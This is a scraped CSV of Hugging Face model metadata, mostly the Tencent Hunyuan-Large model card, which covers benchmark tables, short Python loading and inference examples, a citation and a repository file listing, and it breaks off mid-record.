blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/cosyvoice.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/flow.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/hift.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='CosyVoice-300M-25Hz/speech_tokenizer_v1.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_step1.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='lib/liboptimus_ths-torch2.2-cu121.cpython-310-x86_64-linux-gnu.so', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='lib/liboptimus_ths-torch2.3-cu121.cpython-310-x86_64-linux-gnu.so', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='lib/liboptimus_ths-torch2.5-cu124.cpython-310-x86_64-linux-gnu.so', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_step1.py', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""mrfakename/Step-Audio-TTS-3B"", ""zhiweiliu/tts_app""], ""safetensors"": {""parameters"": {""BF16"": 3529706496}, ""total"": 3529706496}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-17 15:50:57+00:00"", ""cardData"": ""license: apache-2.0\npipeline_tag: text-to-speech"", ""transformersInfo"": null, ""_id"": ""67ae0676f77ed76ae189c1a7"", ""modelId"": ""stepfun-ai/Step-Audio-TTS-3B"", ""usedStorage"": 8631522644}",0,,0,,0,,0,,0,"huggingface/InferenceSupport/discussions/new?title=stepfun-ai/Step-Audio-TTS-3B&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bstepfun-ai%2FStep-Audio-TTS-3B%5D(%2Fstepfun-ai%2FStep-Audio-TTS-3B)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mrfakename/Step-Audio-TTS-3B, zhiweiliu/tts_app",3
|
Tencent-Hunyuan-Large_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv
ADDED
|
@@ -0,0 +1,387 @@
|
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
tencent/Tencent-Hunyuan-Large,"---
language:
- en
pipeline_tag: text-generation
library_name: transformers

license: other
license_name: tencent-license
license_link: https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/LICENSE.txt
---

<p align=""center"">
<img src=""https://dscache.tencent-cloud.cn/upload/uploader/hunyuan-64b418fd052c033b228e04bc77bbc4b54fd7f5bc.png"" width=""400""/> <br>
</p><p></p>

<p align=""center"">
 <a href=""https://github.com/Tencent/Tencent-Hunyuan-Large""><b>GITHUB</b></a>   |   🖥️  <a href=""https://llm.hunyuan.tencent.com/"" style=""color: blue;""><b>official website</b></a>  |  🕖   <a href=""https://cloud.tencent.com/product/hunyuan""><b>HunyuanAPI</b></a>  |  🐳   <a href=""https://gitee.com/Tencent/Tencent-Hunyuan-Large""><b>Gitee</b></a>
</p><p align=""center"">
<a href=""https://arxiv.org/abs/2411.02265"" style=""color: blue;""><b>Technical Report</b></a>  |   <a href=""https://huggingface.co/spaces/tencent/Hunyuan-Large""><b>Demo</b></a>   |   <a href=""https://cloud.tencent.com/document/product/851/112032"" style=""color: blue;""><b>Tencent Cloud TI</b></a>   </p>

<p>
<table align=""center"">
<tbody>
<tr align=""center"">
<td align=""center"" colspan=""3""><strong>Download Models</strong></td>
</tr>
<tr align=""center"">
<td align=""center"" style=""width: 200px;""><strong>Models</strong></td>
<td align=""center"" style=""width: 400px;""><strong>Huggingface Download URL</strong></td>
<td align=""center"" style=""width: 400px;""><strong>Tencent Cloud Download URL</strong></td>
</tr>
<tr align=""center"">
<td align=""center"" style=""width: 200px;"">Hunyuan-A52B-Instruct-FP8</td>
<td style=""width: 400px;""><a href=""https://huggingface.co/tencent/Tencent-Hunyuan-Large/tree/main/Hunyuan-A52B-Instruct-FP8"">Hunyuan-A52B-Instruct-FP8</a></td>
<td style=""width: 400px;""><a href=""https://cdn-large-model.hunyuan.tencent.com/Hunyuan-A52B-Instruct-128k-fp8-20241116.zip"">Hunyuan-A52B-Instruct-FP8</a></td>
</tr>
<tr align=""center"">
<td align=""center"" style=""width: 200px;"">Hunyuan-A52B-Instruct</td>
<td style=""width: 400px;""><a href=""https://huggingface.co/tencent/Tencent-Hunyuan-Large/tree/main/Hunyuan-A52B-Instruct"">Hunyuan-A52B-Instruct</a></td>
<td style=""width: 400px;""><a href=""https://cdn-large-model.hunyuan.tencent.com/Hunyuan-A52B-Instruct-128k-20241116.zip"">Hunyuan-A52B-Instruct</a></td>
</tr>
<tr align=""center"">
<td align=""center"" style=""width: 200px;"">Hunyuan-A52B-Pretrain</td>
<td style=""width: 400px;""><a href=""https://huggingface.co/tencent/Tencent-Hunyuan-Large/tree/main/Hunyuan-A52B-Pretrain"">Hunyuan-A52B-Pretrain</a></td>
<td style=""width: 400px;""><a href=""https://cdn-large-model.hunyuan.tencent.com/Hunyuan-A52B-Pretrain-256k.zip"">Hunyuan-A52B-Pretrain</a></td>
</tr>
</tbody>
</table>
</p>

### Model Introduction

With the rapid development of artificial intelligence technology, large language models (LLMs) have made significant progress in fields such as natural language processing, computer vision, and scientific tasks. However, as these models grow in scale, optimizing resource consumption while maintaining high performance has become a key challenge. To address this challenge, we have explored Mixture of Experts (MoE) models. The newly unveiled Hunyuan-Large (Hunyuan-MoE-A52B) is currently the largest open-source Transformer-based MoE model in the industry, with 389 billion total parameters and 52 billion active parameters.

By open-sourcing the Hunyuan-Large model and revealing related technical details, we hope to inspire more researchers with innovative ideas and collectively advance the progress and application of AI technology. We welcome you to join our open-source community to explore and optimize future AI models together!

### Introduction to Model Technical Advantages

#### Model
- **High-Quality Synthetic Data**: By enhancing training with synthetic data, Hunyuan-Large can learn richer representations, handle long-context inputs, and generalize better to unseen data.

- **KV Cache Compression**: Utilizes Grouped Query Attention (GQA) and Cross-Layer Attention (CLA) strategies to significantly reduce the memory usage and computational overhead of KV caches, improving inference throughput.

- **Expert-Specific Learning Rate Scaling**: Sets different learning rates for different experts to ensure each sub-model effectively learns from the data and contributes to overall performance (a minimal sketch follows this list).

- **Long-Context Processing Capability**: The pre-trained model supports text sequences of up to 256K tokens, and the Instruct model supports up to 128K, significantly enhancing the ability to handle long-context tasks.

- **Extensive Benchmarking**: Conducts extensive experiments across various languages and tasks to validate the practical effectiveness and safety of Hunyuan-Large.

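To make the expert-specific learning rate idea concrete, here is a minimal, hypothetical sketch (not Tencent's training code) that gives the experts of a toy MoE layer their own learning rate via PyTorch optimizer parameter groups; the module shapes and the square-root scaling heuristic are illustrative assumptions:

```python
import torch
import torch.nn as nn

# Toy MoE layer: a router plus a bank of expert MLPs (shapes are arbitrary).
num_experts, top_k, d = 16, 1, 512
experts = nn.ModuleList(nn.Linear(d, d) for _ in range(num_experts))
router = nn.Linear(d, num_experts)

base_lr = 1e-4
# Each expert only sees roughly top_k/num_experts of the tokens, so its
# effective batch size is smaller than that of the dense parameters;
# square-root LR scaling with batch size is one common heuristic for this.
expert_lr = base_lr * (top_k / num_experts) ** 0.5

# Parameter groups let the optimizer apply a different LR per group.
optimizer = torch.optim.AdamW([
    {'params': router.parameters(), 'lr': base_lr},
    {'params': experts.parameters(), 'lr': expert_lr},
])
```
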
## Benchmark Evaluation

The **Hunyuan-Large pre-trained model** achieves the best overall performance compared to both Dense and MoE-based competitors with similar activated parameter sizes. On aggregated benchmarks such as MMLU, MMLU-Pro, and CMMLU, Hunyuan-Large consistently achieves the best results, confirming its comprehensive abilities on aggregated tasks. Hunyuan-Large also shows superior performance in commonsense understanding and reasoning, and in classical NLP tasks such as QA and reading comprehension (e.g., CommonsenseQA, PIQA, and TriviaQA). In mathematics, Hunyuan-Large outperforms all baselines on GSM8K and MATH, and also achieves the best result on the Chinese CMATH benchmark. We also observe that Hunyuan-Large achieves the best overall performance on all Chinese tasks (e.g., CMMLU, C-Eval).

| Model | LLama3.1-405B | LLama3.1-70B | Mixtral-8x22B | DeepSeek-V2 | Hunyuan-Large |
|------------------|---------------|--------------|---------------|-------------|---------------|
| MMLU | 85.2 | 79.3 | 77.8 | 78.5 | **88.4** |
| MMLU-Pro | **61.6** | 53.8 | 49.5 | - | 60.2 |
| BBH | 85.9 | 81.6 | 78.9 | 78.9 | **86.3** |
| HellaSwag | - | - | **88.7** | 87.8 | 86.8 |
| CommonsenseQA | 85.8 | 84.1 | 82.4 | - | **92.9** |
| WinoGrande | 86.7 | 85.3 | 85.0 | 84.9 | **88.7** |
| PIQA | - | - | 83.6 | 83.7 | **88.3** |
| NaturalQuestions | - | - | 39.6 | 38.7 | **52.8** |
| DROP | 84.8 | 79.6 | 80.4 | 80.1 | **88.9** |
| ARC-C | **96.1** | 92.9 | 91.2 | 92.4 | 95.0 |
| TriviaQA | - | - | 82.1 | 79.9 | **89.2** |
| CMMLU | - | - | 60.0 | 84.0 | **90.2** |
| C-Eval | - | - | 59.6 | 81.7 | **91.9** |
| C3 | - | - | 71.4 | 77.4 | **82.3** |
| GSM8K | 89.0 | 83.7 | 83.7 | 79.2 | **92.8** |
| MATH | 53.8 | 41.4 | 42.5 | 43.6 | **69.8** |
| CMATH | - | - | 72.3 | 78.7 | **91.3** |
| HumanEval | 61.0 | 58.5 | 53.1 | 48.8 | **71.4** |
| MBPP | **73.4** | 68.6 | 64.2 | 66.6 | 72.6 |

**Hunyuan-Large-Instruct** achieves consistent improvements on most types of tasks compared to LLMs with similar activated parameter counts, indicating the effectiveness of our post-training. Delving into the model performance across benchmark categories, we find that our instruct model achieves the best performance on the MMLU and MATH datasets. Notably, on MMLU it outperforms LLama3.1-405B by 2.6%, a margin indicative of Hunyuan-Large-Instruct's superior understanding and reasoning across a wide array of language understanding tasks. The model's strength is further underscored on MATH, where it surpasses LLama3.1-405B by a notable margin of 3.6%. Remarkably, this accuracy is achieved with only 52 billion activated parameters, underscoring the model's efficiency.

| Model | LLama3.1 405B Inst. | LLama3.1 70B Inst. | Mixtral 8x22B Inst. | DeepSeekV2.5 Chat | Hunyuan-Large Inst. |
|----------------------|---------------------|--------------------|---------------------|-------------------|---------------------|
| MMLU | 87.3 | 83.6 | 77.8 | 80.4 | **89.9** |
| CMMLU | - | - | 61.0 | - | **90.4** |
| C-Eval | - | - | 60.0 | - | **88.6** |
| BBH | - | - | 78.4 | 84.3 | **89.5** |
| HellaSwag | - | - | 86.0 | **90.3** | 88.5 |
| ARC-C | **96.9** | 94.8 | 90.0 | - | 94.6 |
| GPQA_diamond | **51.1** | 46.7 | - | - | 42.4 |
| MATH | 73.8 | 68.0 | 49.8 | 74.7 | **77.4** |
| HumanEval | 89.0 | 80.5 | 75.0 | 89.0 | **90.0** |
| AlignBench | 6.0 | 5.9 | 6.2 | 8.0 | **8.3** |
| MT-Bench | 9.1 | 8.8 | 8.1 | 9.0 | **9.4** |
| IFEval strict-prompt | **86.0** | 83.6 | 71.2 | - | 85.0 |
| Arena-Hard | 69.3 | 55.7 | - | 76.2 | **81.8** |
| AlpacaEval-2.0 | 39.3 | 34.3 | 30.9 | 50.5 | **51.8** |

## Quick Start

You can quickly get started by referring to the content in the <a href=""https://github.com/Tencent/Tencent-Hunyuan-Large/tree/main/examples"">Quick Start Guide</a>.

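As a rough orientation before the guide, a minimal load-and-generate sketch with `transformers` might look like the following; the checkpoint path, dtype, and device settings are assumptions (the weights actually live in repo subfolders such as `Hunyuan-A52B-Instruct`), so defer to the Quick Start Guide for the supported recipe:

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

# Illustrative id; you may need a local download or the
# 'Hunyuan-A52B-Instruct' subfolder rather than the repo root.
model_id = 'tencent/Tencent-Hunyuan-Large'

# trust_remote_code is needed because the repo ships custom model and
# tokenizer code (modeling_hunyuan.py, tokenization_hy.py).
tokenizer = AutoTokenizer.from_pretrained(model_id, trust_remote_code=True)
model = AutoModelForCausalLM.from_pretrained(
    model_id,
    torch_dtype='auto',
    device_map='auto',  # an A52B checkpoint spans multiple GPUs
    trust_remote_code=True,
)

messages = [{'role': 'user', 'content': 'Explain mixture-of-experts briefly.'}]
# Assumes the tokenizer defines a chat template, as instruct models usually do.
inputs = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors='pt'
).to(model.device)
outputs = model.generate(inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0][inputs.shape[-1]:], skip_special_tokens=True))
```
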
## Inference and Deployment

HunyuanLLM uses TRT-LLM and vLLM for deployment. We are open-sourcing the vLLM deployment (see Inference with vLLM), and the TRT-LLM deployment (see Inference with TRT-LLM) will be available in the near future.

Learn more at <a href=""https://github.com/Tencent/Tencent-Hunyuan-Large"">Tencent-Hunyuan-Large</a>.

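For context, offline inference with vLLM typically looks like the sketch below; the argument values are assumptions, and serving Hunyuan-Large may require the vLLM build distributed via the GitHub repo rather than stock vLLM, so treat the repo's deployment docs as authoritative:

```python
from vllm import LLM, SamplingParams

llm = LLM(
    model='tencent/Tencent-Hunyuan-Large',  # or a local checkpoint path
    trust_remote_code=True,   # custom Hunyuan model/tokenizer code
    tensor_parallel_size=8,   # a MoE of this size is sharded across GPUs
)
params = SamplingParams(temperature=0.7, top_p=0.9, max_tokens=256)
outputs = llm.generate(['Write a haiku about mixture-of-experts.'], params)
print(outputs[0].outputs[0].text)
```
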
### Citation
If you find our work helpful, feel free to cite it.

```
@misc{sun2024hunyuanlargeopensourcemoemodel,
      title={Hunyuan-Large: An Open-Source MoE Model with 52 Billion Activated Parameters by Tencent},
      author={Xingwu Sun and Yanfeng Chen and Yiqing Huang and Ruobing Xie and Jiaqi Zhu and Kai Zhang and Shuaipeng Li and Zhen Yang and Jonny Han and Xiaobo Shu and Jiahao Bu and Zhongzhi Chen and Xuemeng Huang and Fengzong Lian and Saiyong Yang and Jianfeng Yan and Yuyuan Zeng and Xiaoqin Ren and Chao Yu and Lulu Wu and Yue Mao and Tao Yang and Suncong Zheng and Kan Wu and Dian Jiao and Jinbao Xue and Xipeng Zhang and Decheng Wu and Kai Liu and Dengpeng Wu and Guanghui Xu and Shaohua Chen and Shuang Chen and Xiao Feng and Yigeng Hong and Junqiang Zheng and Chengcheng Xu and Zongwei Li and Xiong Kuang and Jianglu Hu and Yiqi Chen and Yuchi Deng and Guiyang Li and Ao Liu and Chenchen Zhang and Shihui Hu and Zilong Zhao and Zifan Wu and Yao Ding and Weichao Wang and Han Liu and Roberts Wang and Hao Fei and Peijie She and Ze Zhao and Xun Cao and Hai Wang and Fusheng Xiang and Mengyuan Huang and Zhiyuan Xiong and Bin Hu and Xuebin Hou and Lei Jiang and Jiajia Wu and Yaping Deng and Yi Shen and Qian Wang and Weijie Liu and Jie Liu and Meng Chen and Liang Dong and Weiwen Jia and Hu Chen and Feifei Liu and Rui Yuan and Huilin Xu and Zhenxiang Yan and Tengfei Cao and Zhichao Hu and Xinhua Feng and Dong Du and Tinghao She and Yangyu Tao and Feng Zhang and Jianchen Zhu and Chengzhong Xu and Xirui Li and Chong Zha and Wen Ouyang and Yinben Xia and Xiang Li and Zekun He and Rongpeng Chen and Jiawei Song and Ruibin Chen and Fan Jiang and Chongqing Zhao and Bo Wang and Hao Gong and Rong Gan and Winston Hu and Zhanhui Kang and Yong Yang and Yuhong Liu and Di Wang and Jie Jiang},
      year={2024},
      eprint={2411.02265},
      archivePrefix={arXiv},
      primaryClass={cs.CL},
      url={https://arxiv.org/abs/2411.02265},
}
```

","{""id"": ""tencent/Tencent-Hunyuan-Large"", ""author"": ""tencent"", ""sha"": ""023bb217c7f4fdfabd7308a344994b0e9ac7359c"", ""last_modified"": ""2025-01-19 05:30:33+00:00"", ""created_at"": ""2024-10-22 14:27:04+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 153, ""downloads_all_time"": null, ""likes"": 587, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""text-generation"", ""en"", ""arxiv:2411.02265"", ""license:other"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlibrary_name: transformers\nlicense: other\nlicense_name: tencent-license\nlicense_link: https://huggingface.co/tencent/Tencent-Hunyuan-Large/blob/main/LICENSE.txt\npipeline_tag: text-generation"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/configuration_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/hy.tiktoken', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00001-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00002-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00003-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00004-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00005-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00006-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00007-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00008-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00009-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00010-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00011-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00012-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00013-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00014-of-00080.safetensors', size=None, 
blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00015-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00016-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00017-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00018-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00019-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00020-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00021-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00022-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00023-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00024-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00025-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00026-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00027-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00028-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00029-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00030-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00031-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00032-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00033-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00034-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00035-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00036-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00037-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00038-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00039-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00040-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00041-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00042-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00043-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00044-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00045-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00046-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00047-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00048-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00049-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00050-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00051-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00052-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00053-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00054-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00055-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00056-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00057-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00058-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00059-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00060-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00061-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00062-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00063-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00064-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00065-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00066-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00067-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00068-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00069-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00070-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00071-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00072-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00073-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00074-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00075-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00076-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00077-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00078-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00079-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model-00080-of-00080.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/modeling_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/tokenization_hy.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct-FP8/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/configuration_hunyuan.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Hunyuan-A52B-Instruct/generation_config.json', size=None, blob_id=None, 